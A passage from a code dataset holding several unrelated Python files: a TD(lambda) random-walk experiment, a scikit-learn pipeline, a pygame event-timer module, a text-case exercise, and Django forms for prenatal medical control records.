samples_of_winnins=[]\n for k in range (100):\n \n set_of_ten = []\n \n for s in range(10):\n \n currentStates = [0,0,0,1,0,0,0]\n statehistory_vector =[3]\n for i in range(1000):\n \n action=rand.choices(['right','left'])\n if action[0] =='left':\n \n value = currentstate(currentStates) -1\n currentStates=[0,0,0,0,0,0,0]\n currentStates[value]=1\n \n \n if action[0] =='right':\n \n value = currentstate(currentStates) +1\n currentStates=[0,0,0,0,0,0,0]\n currentStates[value]=1\n \n statehistory_vector.append(value)\n if value==0:\n \n break\n if value==6:\n \n break\n set_of_ten.append(statehistory_vector)\n \n samples_of_winnins.append(set_of_ten)\n return samples_of_winnins\ndef currentstate(vector):\n \n for i in range(len(vector)):\n if i== 1:\n return vector.index(i)\ndef P_t(weight,x_t):\n \n weight=np.array(weight)\n x_t=np.array(x_t)\n return np.dot(weight,x_t)\n\n \ndef into_unit_vector(value):\n if value == 0:\n print(\"it ended on the left\")\n return 0\n if value == 6:\n print(\"ended on the right\")\n return 1\n if value == 1:\n return np.array([1,0,0,0,0])\n if value == 2:\n return np.array([0,1,0,0,0])\n if value == 3:\n return np.array([0,0,1,0,0])\n if value == 4:\n return np.array([0,0,0,1,0])\n if value == 5:\n return np.array([0,0,0,0,1])\n \ndef rmse(predictions, targets):\n return np.sqrt(np.mean((predictions-targets)**2))\n\nmean_vec=[]\nlist_of_alpha_rmse=[]\nlist_of_list_tograph=[]\nsample_dataset=generate_a_dataset()\nideal_prediction = np.array([1/6,1/3,1/2,2/3,5/6])\nlamda_vec=[0,.2,.3,.4,.6,.8,1]\nsum_delta_t_vec=[]\ncounter=0\nepsilon=1\nalpha_vec=[0.01,.1,.2,.3,.4,.5,.58]\navg_weight_vec=[]\nrmse_to_plot_vec=[]\n\nweight=np.array([.5,.5,.5,.5,.5])\nrmse_vec=[]\nfor lamda in lamda_vec:\n for alpha in alpha_vec: \n alpha=alpha\n\n initial_weight=weight\n \n weight_t=initial_weight\n \n sum_delta_t_vec=[]\n epsilon=1\n avg_weight_vec=[]\n counter=0 \n \n lamda=lamda\n while True:\n \n for sample_set in sample_dataset:\n \n ##for updating weights for each 10 sequence\n # each sampleset is 10 sequence\n sum_delta_t_vec=[]\n for sequence in sample_set:\n t=0\n delta_t_vector=[]\n ## this while true iterates through the sequence computes Delta_t for a given sequence\n while True:\n \n sum_of_gradient_times_lamda=np.array([0,0,0,0,0])\n for k in range(t+1):\n sum_of_gradient_times_lamda=sum_of_gradient_times_lamda+ (lamda**(t-k))*into_unit_vector(\n sequence[k])\n \n if sequence[t+1]==6:\n p_t2=1\n elif sequence[t+1]==0:\n p_t2=0\n else:\n p_t2=P_t(initial_weight,into_unit_vector(sequence[t+1]))\n \n p_t1= P_t(initial_weight,into_unit_vector(sequence[t]))\n \n alpha_times_weights = alpha*(p_t2 - p_t1)\n \n delta_t_vector.append(alpha_times_weights*sum_of_gradient_times_lamda) \n if sequence[t+1]==6 or sequence[t+1]==0:\n sum_delta_t_vec.append(sum(delta_t_vector))\n someweight=initial_weight\n# \n initial_weight=initial_weight+ sum(sum_delta_t_vec)\n epsilon=(abs(sum(initial_weight)-sum(someweight)))\n sum_delta_t_vec=[]\n delta_t_vector=[]\n \n break\n t+=1\n ##update Weight\n \n rmse_vec.append(rmse(initial_weight,ideal_prediction))\n initial_weight=weight\n sum_delta_t_vec=[]\n delta_t_vector=[]\n counter+=1 \n if counter==100: \n break \n \n mean_vec.append(sum(rmse_vec)/len(rmse_vec))\n rmse_vec=[]\n \n if sum(mean_vec)/len(mean_vec)>1:\n \n list_of_alpha_rmse.append(float('NaN'))\n else: \n list_of_alpha_rmse.append(sum(mean_vec)/len(mean_vec))\n \n mean_vec=[]\n list_of_list_tograph.append(list_of_alpha_rmse)\n list_of_alpha_rmse=[]\n \n\n\n\n## Figure 
5\nkm=list_of_list_tograph\n\nlist_of_list_tograph=km\n\nwinner_alpha_vecs=[]\nfor i in km:\n winner_alpha_vecs.append(min(i))\n\nlist_of_list_tograph=[]\nfor i in range(len(winner_alpha_vecs)):\n sample_dataset=generate_a_dataset()\n \n ideal_prediction = np.array([1/6,1/3,1/2,2/3,5/6])\n\n lamda_vec=[0,.2,.3,.4,.6,.8,1]\n\n sum_delta_t_vec=[]\n counter=0\n epsilon=1 \n avg_weight_vec=[]\n rmse_to_plot_vec=[]\n\n weight=np.array([.5,.5,.5,.5,.5])\n rmse_vec=[]\n mean_vec=[] \n alpha=winner_alpha_vecs[i] \n initial_weight=weight\n weight_t=initial_weight \n sum_delta_t_vec=[] \n avg_weight_vec=[]\n lamda=lamda_vec[i]\n \n while True:\n for sample_set in sample_dataset:\n \n ##for updating weights for each 10 sequence\n # each sampleset is 10 sequence\n sum_delta_t_vec=[]\n for sequence in sample_set:\n t=0\n delta_t_vector=[]\n ## this while true iterates through the sequence computes Delta_t for a given sequence\n while True:\n \n sum_of_gradient_times_lamda=np.array([0,0,0,0,0])\n for k in range(t+1):\n sum_of_gradient_times_lamda=sum_of_gradient_times_lamda+ (lamda**(t-k))*into_unit_vector(\n sequence[k])\n \n if sequence[t+1]==6:\n p_t2=1\n elif sequence[t+1]==0:\n p_t2=0\n else:\n p_t2=P_t(initial_weight,into_unit_vector(sequence[t+1]))\n \n p_t1= P_t(initial_weight,into_unit_vector(sequence[t]))\n \n alpha_times_weights = alpha*(p_t2 - p_t1)\n \n delta_t_vector.append(alpha_times_weights*sum_of_gradient_times_lamda) \n if sequence[t+1]==6 or sequence[t+1]==0:\n sum_delta_t_vec.append(sum(delta_t_vector))\n someweight=initial_weight\n ## update weight vector\n initial_weight=initial_weight+ sum(sum_delta_t_vec)\n ##calculate RMSE\n rmse_vec.append(rmse(initial_weight,ideal_prediction))\n \n sum_delta_t_vec=[]\n delta_t_vector=[]\n\n break\n t+=1 \n counter+=1# \n if counter==100: \n break\n \n \n mean_vec.append(sum(rmse_vec)/len(rmse_vec))\n rmse_vec=[]\n\n if sum(mean_vec)/len(mean_vec)>1:\n \n list_of_alpha_rmse.append(float('NaN'))\n else: \n list_of_alpha_rmse.append(sum(mean_vec)/len(mean_vec))\n \n mean_vec=[]\n\n\nlist_of_list_tograph.append(list_of_alpha_rmse)\nlist_of_alpha_rmse=[]\n\n\n \n\n## graphing Figure 4\nplot_4rd_diagram(km,alpha_vec)\n\n## graph of Figure 5\nplot_3rd_diagram(lamda_vec,list_of_list_tograph[0])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Project1/figure4_and_figure5.py","file_name":"figure4_and_figure5.py","file_ext":"py","file_size_in_byte":9598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"213620928","text":"from sklearn.compose import ColumnTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split, GridSearchCV\n\n#\n# Dataset fields\n#\nnumeric_fields = [\"if\"+str(i) for i in range(1,14)]\ncategorical_fields = [\"cf\"+str(i) for i in range(1,27)] + [\"day_number\"]\n\n\nfields = [\"id\", \"label\"] + numeric_fields + categorical_fields\n\n#\n# Model pipeline\n#\n\n# We create the preprocessing pipelines for both numeric and categorical data.\n#numeric_features = ['CLEANLINESS', 'ROOM', 'SERVICE', 'LOCATION']\nnumeric_features = fields[2:15]\nnumeric_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='median')),\n ('scaler', StandardScaler())\n])\n\n#categorical_features = ['city', 'country']\n# this is probably going to be bad\ncategorical_features = 
fields[15:]\ncategorical_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='constant', fill_value='missing')),\n ('onehot', OneHotEncoder(handle_unknown='ignore'))\n])\n\npreprocessor = ColumnTransformer(\n transformers=[\n ('num', numeric_transformer, numeric_features),\n ('cat', categorical_transformer, categorical_features)\n ]\n)\n\n# Now we have a full prediction pipeline.\nmodel = Pipeline(steps=[\n ('preprocessor', preprocessor),\n ('linearregression', LinearRegression())\n])\n\n\n\n\n","sub_path":"projects/0/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"380517322","text":"from threading import Thread, Timer as threadTimer\nfrom pygame import event as pyEvent, register_quit\nfrom pygame.fastevent import post as post_event\nfrom pygame.fastevent import init as fastevent_init\nfrom pygame import init as pygame_init\nfrom math import floor\n\n# By Gudni Natan Gunnarsson, 2017\n\n\nclass Timer(object):\n \"\"\"This is an internal class that handles individual timers.\n Use the BetterTimers class instead.\"\"\"\n\n def __init__(self, event, rate):\n '''Create the timer object'''\n self.__running = False\n self.__event = event\n self.__rate = rate\n self.__t = None\n fastevent_init()\n\n def _eventPoster(self, event, rate):\n '''Posts events at the specified rate via a threadTimer.'''\n e = pyEvent\n if type(event) is not e.EventType:\n event = e.Event(event)\n\n def post(event):\n if self.__running:\n post_event(event)\n postThread.run()\n if not postThread.daemon:\n postThread.daemon = True\n\n postThread = threadTimer(float(rate - 1) / 1000.0, post, args=(event,))\n postThread.daemon = True\n postThread.start()\n\n def start_timer(self):\n '''Start the event timer. Object will start to post events at a\n regular rate.\n '''\n if not self.__running:\n self.__t = Thread(\n target=self._eventPoster,\n args=(self.__event, self.__rate)\n )\n self.__t.daemon = True\n self.__running = True\n self.__t.start()\n\n def stop_timer(self):\n '''Stop the event timer if it was running'''\n if self.__running:\n self.__running = False\n self.__t.join()\n\n def change_rate(self, rate):\n '''Changes the timer rate and restarts it.'''\n self.__rate = rate\n\n self.stop_timer()\n self.start_timer()\n\n def get_event(self):\n return self.__event\n\n\nclass BetterTimers():\n def __init__(self):\n '''Makes a BetterTimers object. Call pygame.quit to end all timers.'''\n self.__timers = list()\n pygame_init()\n register_quit(self.end_all_timers)\n fastevent_init()\n\n def set_timer(self, event, rate, delay=0):\n '''Sets a timer for an event. Each event object will only have one\n timer associated with it. 
Setting a timers rate to 0 will stop it.'''\n if floor(delay) > 0:\n delayTimer = threadTimer(\n float(delay - 1) / 1000.0,\n self.set_timer,\n args=(event, rate)\n )\n delayTimer.daemon = True\n delayTimer.start()\n\n return\n\n t = Timer(event, rate)\n for e in self.__timers:\n if e.get_event() == event:\n if floor(rate) > 0:\n e.change_rate(rate)\n else:\n e.stop_timer()\n self.__timers.remove(e)\n return\n if floor(rate) > 0:\n t.start_timer()\n self.__timers.append(t)\n\n def stop_timer(self, event):\n '''Stops any timer associated to the given event.'''\n self.set_timer(event, 0)\n\n def end_all_timers(self):\n '''Stops all the timers'''\n for t in self.__timers:\n t.stop_timer()\n\n self.__timers = list()\n\n def __del__(self):\n self.end_all_timers()\n\n\ntimers = BetterTimers()\n","sub_path":"better_timers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"2966021","text":"'''\nCreated on 29 Jun 2019\n\n@author: Kamil\n'''\n'''\n\n Its a game which allows you to play with english sentences.\n User will enter a sentence in any format.(uppercase or lowercase or a mix of both)\n Program must convert the given sentence in google case .What is a google case style of sentence?[know_about_it_here:]( It is a style of writing where we replace all lower case letters into upper case letters leaving the initial of all the words).\n Subgoals:\n Program must then convert the given sentence in camel case.To know more about camel case click_here\n Sentence can be entered with any number of spaces.\n\nHint: If you are dealing with languages such as c then consider the sentences as the char array.\n'''\nclass ChangeTextTo():\n def __init__(self, text):\n self.text_to_change = text.strip().upper()\n \n def google_case(self):\n self.text = self.text_to_change\n self.text = self.text.split(' ')\n self.text = list(filter(None, self.text))\n for ind, word in enumerate(self.text):\n word = word.strip().replace(word[0], word[0].lower())\n self.text[ind] = word\n return ' '.join(self.text)\n \n def camel_case(self):\n self.text = self.text_to_change\n self.text = self.text.title().replace(' ', '')\n return self.text\n \ndef program():\n change_text = ChangeTextTo(' I got intern at geeksforgeeks')\n print(change_text.google_case())\n print(change_text.camel_case())\n \nif __name__ == '__main__':\n program()","sub_path":"google_case/google_case.py","file_name":"google_case.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"187167007","text":"# coding:utf-8\nfrom datetime import datetime\nfrom django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.forms import inlineformset_factory\n\nfrom ubigeo.models import Departamento, Provincia\nfrom establecimientos.models import Establecimiento\nfrom partos.models import PartogramaMedicion,Ingreso\n\nfrom .models import Control, ExamenFisico, Laboratorio, Diagnostico, ExamenFisicoFetal\n\n\nclass ControlForm(forms.ModelForm):\n class Meta:\n model = Control\n exclude = (\n 'establecimiento', 'embarazo', 'paciente', 'visito_sintomas',\n 'visito_diagnostico', 'atencion_hora')\n labels = {\n 'fcf': u'',\n 'situacion': u'',\n 'presentacion': u'',\n 'posicion': u'',\n 'movimientos_fetales': u'',\n 'imc': u'IMC'\n }\n\n def __init__(self, *args, **kwargs):\n\n establecimiento_id = kwargs.pop('establecimiento_id')\n 
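One detail worth flagging in the google_case record above: word.replace(word[0], word[0].lower()) lowers every occurrence of the initial letter in the word ('GEEKSFORGEEKS' becomes 'gEEKSFORgEEKS'), not just the first character. A standalone sketch that keeps the intended behaviour by slicing instead of replacing:

def google_case(text):
    # upper-case everything, then lower only the first letter of each word
    return ' '.join(w[0].lower() + w[1:] for w in text.strip().upper().split())

def camel_case(text):
    return ''.join(w.capitalize() for w in text.split())

print(google_case(' I got intern at geeksforgeeks'))  # i gOT iNTERN aT gEEKSFORGEEKS
print(camel_case(' I got intern at geeksforgeeks'))   # IGotInternAtGeeksforgeeks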
establecimiento_actual = Establecimiento.objects.get(id=establecimiento_id)\n super(ControlForm, self).__init__(*args, **kwargs)\n\n if establecimiento_actual.is_sistema_externo_admision:\n self.fields['proxima_cita'].widget = forms.HiddenInput()\n self.fields['proxima_cita'].required = False\n\n self.fields['eg_fum'].widget.attrs['readonly'] = 'True'\n self.fields['eg_ecografia'].widget.attrs['readonly'] = 'True'\n self.fields['eg_altura_uterina'].widget.attrs['readonly'] = 'True'\n self.fields['fecha_probable_parto_fum'].widget.attrs[\n 'readonly'] = 'True'\n self.fields['fecha_probable_parto_ecografia'].widget.attrs[\n 'readonly'] = 'True'\n self.fields['fecha_probable_parto_altura_uterina'].widget.attrs[\n 'readonly'] = 'True'\n self.fields['temperatura'].widget.attrs = {'step': 0.1}\n self.fields['altura_uterina'].required = False\n self.fields['fcf'].required = False\n self.fields['presion_sistolica'].required = True\n self.fields['presion_diastolica'].required = True\n\n if not self.data:\n self.fields['zika_departamento'].queryset = (\n Departamento.objects.filter(pais=self.instance.zika_pais))\n self.fields['zika_provincia'].queryset = (\n Provincia.objects.filter(\n departamento=self.instance.zika_departamento))\n\n def clean_atencion_fecha(self):\n fecha = self.cleaned_data.get('atencion_fecha', '')\n if fecha and isinstance(fecha, datetime) and \\\n self.instance.embarazo.controles.filter(\n atencion_fecha=fecha).exists():\n raise ValidationError(\n 'Ya existe registrado un control para esta fecha')\n return fecha\n\n def clean_proxima_cita(self):\n cita = self.cleaned_data['proxima_cita']\n if cita:\n\n atencion = self.cleaned_data.get('atencion_fecha')\n\n if not atencion:\n raise forms.ValidationError(\n u'La fecha de atención no puede se vacío.'\n )\n\n if cita <= atencion:\n raise forms.ValidationError(\n u'La fecha de la cita no puede ser menor o igual '\n u'a la fecha de atención')\n\n return cita\n\n def clean_altura_uterina(self):\n altura_uterina = self.cleaned_data['altura_uterina']\n\n '''\n if self.cleaned_data['eg_elegida'] == 'fum' and \\\n self.cleaned_data['eg_fum'].__len__() > 0:\n edad_gestacional_semanas = int(\n self.cleaned_data['eg_fum'].split()[0])\n elif self.cleaned_data['eg_elegida'] == 'ecografia' and \\\n self.cleaned_data['eg_ecografia'].__len__() > 0:\n edad_gestacional_semanas = int(\n self.cleaned_data['eg_ecografia'].split()[0])\n elif self.cleaned_data['eg_elegida'] == 'altura uterina' and \\\n self.cleaned_data['eg_altura_uterina'].__len__() > 0:\n edad_gestacional_semanas = int(\n self.cleaned_data['eg_altura_uterina'].split()[0])\n else:\n edad_gestacional_semanas = None\n\n if edad_gestacional_semanas is not None:\n if edad_gestacional_semanas >= 12:\n if altura_uterina <= 0 or altura_uterina > 100:\n raise forms.ValidationError(\n u'La altura uterina debe ser un número positivo '\n 'de maximo 2 cifras')\n '''\n if altura_uterina:\n if altura_uterina <= 0 or altura_uterina >= 100:\n raise forms.ValidationError(\n u'La altura uterina debe ser un número positivo '\n 'de maximo 2 cifras')\n\n return altura_uterina\n\n '''def clean_fcf(self):\n fcf = self.cleaned_data['fcf']\n\n if self.cleaned_data['eg_elegida'] == 'fum' and \\\n self.cleaned_data['eg_fum'].__len__() > 0:\n edad_gestacional_semanas = int(\n self.cleaned_data['eg_fum'].split()[0])\n elif self.cleaned_data['eg_elegida'] == 'ecografia' and \\\n self.cleaned_data['eg_ecografia'].__len__() > 0:\n edad_gestacional_semanas = int(\n self.cleaned_data['eg_ecografia'].split()[0])\n 
elif self.cleaned_data['eg_elegida'] == 'altura uterina' and \\\n self.cleaned_data['eg_altura_uterina'].__len__() > 0:\n edad_gestacional_semanas = int(\n self.cleaned_data['eg_altura_uterina'].split()[0])\n else:\n edad_gestacional_semanas = None\n\n if edad_gestacional_semanas is not None:\n if edad_gestacional_semanas > 19:\n if fcf < 120 or fcf > 400:\n raise forms.ValidationError(\n u'Asegúrese de que este valor esta entre 120 y 400')\n\n return fcf'''\n\n def set_embarazo(self, embarazo):\n self.instance.embarazo = embarazo\n\n\nclass ExamenFisicoFetalForm(forms.ModelForm):\n control = None\n eliminado = eliminado = forms.CharField(widget=forms.HiddenInput(),\n required=False) # forms.BooleanField(initial=False, required= False)\n\n class Meta:\n model = ExamenFisicoFetal\n\n labels = {\n 'fcf': u'',\n 'situacion': u'',\n 'presentacion': u'',\n 'posicion': u'',\n 'movimientos_fetales': u'',\n 'visible': u'',\n }\n\n def __init__(self, *args, **kwargs):\n super(ExamenFisicoFetalForm, self).__init__(*args, **kwargs)\n\n def get_eliminado(self):\n return self['eliminado'].value()\n\n def set_control(self, control):\n\n self.control = control\n\n def clean_fcf(self):\n\n fcf = self.cleaned_data['fcf']\n\n if self.get_eliminado():\n return fcf\n\n if self.control:\n control = self.control\n else:\n control = self.instance.control\n\n eg_elegida = control.eg_elegida\n\n if eg_elegida == 'fum' and \\\n control.eg_fum.__len__() > 0:\n edad_gestacional_semanas = int(\n control.eg_fum.split()[0])\n elif eg_elegida == 'ecografia' and \\\n control.eg_ecografia.__len__() > 0:\n edad_gestacional_semanas = int(\n control.eg_ecografia.split()[0])\n elif eg_elegida == 'altura uterina' and \\\n control.eg_altura_uterina.__len__() > 0:\n edad_gestacional_semanas = int(\n control.eg_altura_uterina.split()[0])\n else:\n edad_gestacional_semanas = None\n\n if edad_gestacional_semanas is not None:\n if edad_gestacional_semanas > 19:\n if fcf < 120 or fcf > 400:\n raise forms.ValidationError(u'Asegúrese de que este valor esta entre 120 y 400')\n # self.add_error('fcf','Asegúrese de que este valor esta entre 120 y 400')\n\n return fcf\n\n\nExamenFisicoFetalFormSet = inlineformset_factory(Control, ExamenFisicoFetal, form=ExamenFisicoFetalForm, min_num=1,\n max_num=5, extra=0)\n\n\nclass ExamenFisicoForm(forms.ModelForm):\n BOOLEAN_CHOICES = (\n (True, u'Si'),\n (False, u'No'),\n (None, u'N/A')\n )\n\n piel_y_mucosas = forms.ChoiceField(\n choices=ExamenFisico.CN_CHOICES, widget=forms.RadioSelect)\n mamas = forms.ChoiceField(\n choices=ExamenFisico.CN_CHOICES, widget=forms.RadioSelect)\n respiratorio = forms.ChoiceField(\n choices=ExamenFisico.CN_CHOICES, widget=forms.RadioSelect)\n cardiovascular = forms.ChoiceField(\n choices=ExamenFisico.CN_CHOICES, widget=forms.RadioSelect)\n odontologico = forms.ChoiceField(\n choices=ExamenFisico.CN_CHOICES, widget=forms.RadioSelect)\n abdomen = forms.ChoiceField(\n choices=ExamenFisico.CN_CHOICES, widget=forms.RadioSelect)\n urinario = forms.ChoiceField(\n choices=ExamenFisico.CN_CHOICES, widget=forms.RadioSelect)\n neurologico = forms.ChoiceField(\n choices=ExamenFisico.CN_CHOICES, widget=forms.RadioSelect)\n pelvimetria = forms.ChoiceField(\n choices=ExamenFisico.PELVIMETRIA_CHOICES, widget=forms.RadioSelect)\n examen_ginecologico = forms.ChoiceField(\n label=u'Examen Gineco-Obstétrico', choices=BOOLEAN_CHOICES,\n widget=forms.RadioSelect, initial=None)\n especuloscopia = forms.ChoiceField(\n label=u'Especuloscopia', choices=BOOLEAN_CHOICES,\n 
widget=forms.RadioSelect, initial=None)\n tv_cambio_cervicales = forms.ChoiceField(\n label=u'Cambios cervicales', choices=BOOLEAN_CHOICES,\n widget=forms.RadioSelect, initial=None)\n\n tv_tb_consistencia = forms.ChoiceField(\n label=u'Consistencia', widget=forms.RadioSelect,\n choices=ExamenFisico.TB_CONSISTENCIA_CHOICES, required=False)\n tv_tb_posicion = forms.ChoiceField(\n label=u'Posición', widget=forms.RadioSelect,\n choices=ExamenFisico.TB_POSICION_CHOICES, required=False)\n tv_tb_borramiento = forms.ChoiceField(\n label=u'Borramiento', widget=forms.RadioSelect,\n choices=ExamenFisico.TB_BORRAMIENTO_CHOICES, required=False)\n tv_tb_dilatacion = forms.ChoiceField(\n label=u'Dilatación', widget=forms.RadioSelect,\n choices=ExamenFisico.TB_DILATACION_CHOICES, required=False)\n tv_tb_altura_presentacion = forms.ChoiceField(\n label=u'Altura presentación', widget=forms.RadioSelect,\n choices=ExamenFisico.TB_ALTURA_PRESENTACION_CHOICES, required=False)\n\n eg_dolor = forms.ChoiceField(\n label=u'Dolor', choices=ExamenFisico.DOLOR_CHOICES,\n widget=forms.RadioSelect, initial=ExamenFisico.N_A)\n eg_posicion = forms.ChoiceField(\n label=u'Posición', choices=ExamenFisico.POSICION_CHOICES,\n widget=forms.RadioSelect)\n eg_restos = forms.ChoiceField(\n label=u'Restos', choices=ExamenFisico.RESTOS_CHOICES,\n widget=forms.RadioSelect)\n eg_culdocentesis = forms.ChoiceField(\n label=u'Culdocentesis', choices=BOOLEAN_CHOICES,\n widget=forms.RadioSelect)\n eg_fondo_de_saco = forms.ChoiceField(\n label=u'Fondo de saco', choices=ExamenFisico.FONDO_DE_SACO_CHOICES,\n widget=forms.RadioSelect)\n eg_mal_olor = forms.ChoiceField(\n label=u'Mal olor', choices=BOOLEAN_CHOICES, widget=forms.RadioSelect)\n\n tb_fields = (\n 'tv_tb_consistencia', 'tv_tb_posicion', 'tv_tb_borramiento',\n 'tv_tb_dilatacion', 'tv_tb_altura_presentacion', 'tv_tb_resultado')\n\n def clean_tv_tb_resultado(self):\n flag = True\n if self.cleaned_data['tv_tb_aplica']:\n for field in self.tb_fields:\n value = self.cleaned_data[field]\n flag = bool(value) and flag\n if not flag:\n raise forms.ValidationError(\n 'Si Test de Bishop aplica debe llenar todos '\n 'los campos de Test de Bishop')\n else:\n for field in self.tb_fields:\n self.cleaned_data[field] = None\n return self.cleaned_data['tv_tb_resultado']\n\n class Meta:\n model = ExamenFisico\n exclude = ('control',)\n labels = {\n 'tv_altura_presentacion': u'Descenso cefálico'\n }\n\n\nclass LaboratorioForm(forms.ModelForm):\n grupo = forms.ChoiceField(\n label=u'Grupo', choices=Laboratorio.GRUPO_CHOICES,\n widget=forms.RadioSelect, required=False)\n factor = forms.ChoiceField(\n label=u'Factor RH', choices=Laboratorio.FACTOR_CHOICES,\n widget=forms.RadioSelect, required=False)\n\n glicemia_1 = forms.ChoiceField(\n label=u'Glicemia 1', choices=Laboratorio.NORMAL_ANORMAL_NO_SE_HIZO,\n widget=forms.RadioSelect)\n glicemia_2 = forms.ChoiceField(\n label=u'Glicemia 2', choices=Laboratorio.NORMAL_ANORMAL_NO_SE_HIZO,\n widget=forms.RadioSelect)\n tolerancia_glucosa = forms.ChoiceField(\n label=u'Tolerancia glucosa',\n choices=Laboratorio.NORMAL_ANORMAL_CHOICES, widget=forms.RadioSelect)\n\n rapida_proteinuria = forms.ChoiceField(\n label=u'Prueba rápida de Proteinuria',\n choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect, initial=Laboratorio.NO_SE_HIZO)\n rapida_proteinuria_2 = forms.ChoiceField(\n label=u'Prueba rápida de Proteinuria',\n choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect, initial=Laboratorio.NO_SE_HIZO)\n 
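The form fields above and below this point declare dozens of near-identical radio-button ChoiceFields by hand. A hedged sketch of a small factory that would collapse each declaration to one line; it assumes Django is installed, and the Laboratorio choice tuples are the ones this record's models already define:

from django import forms

def radio_choice(label, choices, required=True, initial=None):
    # one radio-select ChoiceField with the keyword pattern every field here repeats
    return forms.ChoiceField(label=label, choices=choices,
                             widget=forms.RadioSelect,
                             required=required, initial=initial)

# usage inside the form body, e.g.:
#     urocultivo = radio_choice(u'Urocultivo', Laboratorio.POSITIVO_NEGATIVO_CHOICES)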
rapida_proteinuria_3 = forms.ChoiceField(\n label=u'Prueba rápida de Proteinuria',\n choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect, initial=Laboratorio.NO_SE_HIZO)\n\n vdrl_rp_1 = forms.ChoiceField(\n label=u'VDRL/RPR 1',\n choices=Laboratorio.REACTIVO_NO_REACTIVO_NO_SE_HIZO,\n widget=forms.RadioSelect)\n vdrl_rp_2 = forms.ChoiceField(\n label=u'VDRL/RPR 2', choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect)\n fta_abs = forms.ChoiceField(\n label=u'FTA Abs', choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect)\n tpha = forms.ChoiceField(\n label=u'THPA', choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect)\n rapida_sifilis = forms.ChoiceField(\n label=u'Primera prueba rápida sífilis',\n choices=Laboratorio.REACTIVO_NO_REACTIVO_NO_SE_HIZO,\n widget=forms.RadioSelect)\n rapida_sifilis_2 = forms.ChoiceField(\n label=u'Segunda prueba rápida sífilis',\n choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect)\n rapida_vih_1 = forms.ChoiceField(\n label=u'Primera prueba rápida VIH',\n choices=Laboratorio.REACTIVO_NO_REACTIVO_NO_SE_HIZO,\n widget=forms.RadioSelect)\n rapida_vih_2 = forms.ChoiceField(\n label=u'Segunda prueba rápida VIH',\n choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect)\n elisa = forms.ChoiceField(\n label=u'ELISA VIH', choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect)\n\n ifi_western_blot = forms.ChoiceField(\n label=u'IFI/Western Blot',\n choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n htlv_1 = forms.ChoiceField(\n label=u'HTLV 1', choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n torch = forms.ChoiceField(\n label=u'TORCH', choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n pcr_zika = forms.ChoiceField(\n label=u'PCR Zika', choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n gota_gruesa = forms.ChoiceField(\n label=u'Gota gruesa', choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n malaria_prueba_rapida = forms.ChoiceField(\n label=u'Malaria prueba rápida',\n choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n fluorencia_malaria = forms.ChoiceField(\n label=u'Fluorescencia malaria',\n choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n examen_completo_orina_1 = forms.ChoiceField(\n label=u'Examen completo orina 1',\n choices=Laboratorio.POSITIVO_NEGATIVO_NO_SE_HIZO,\n widget=forms.RadioSelect)\n examen_completo_orina_2 = forms.ChoiceField(\n label=u'Examen completo orina 2',\n choices=Laboratorio.POSITIVO_NEGATIVO_NO_SE_HIZO,\n widget=forms.RadioSelect)\n\n leucocituria = forms.ChoiceField(\n label=u'Leucocituria',\n choices=Laboratorio.POSITIVO_NEGATIVO_NO_SE_HIZO,\n widget=forms.RadioSelect)\n nitritos = forms.ChoiceField(\n label=u'Nitritos', choices=Laboratorio.POSITIVO_NEGATIVO_NO_SE_HIZO,\n widget=forms.RadioSelect)\n urocultivo = forms.ChoiceField(\n label=u'Urocultivo', choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n bk_en_esputo = forms.ChoiceField(\n label=u'BK en esputo', choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n listeria = forms.ChoiceField(\n label=u'Listeria', choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n tamizaje_hepatitis_b = forms.ChoiceField(\n label=u'Tamizaje hepatitis B',\n 
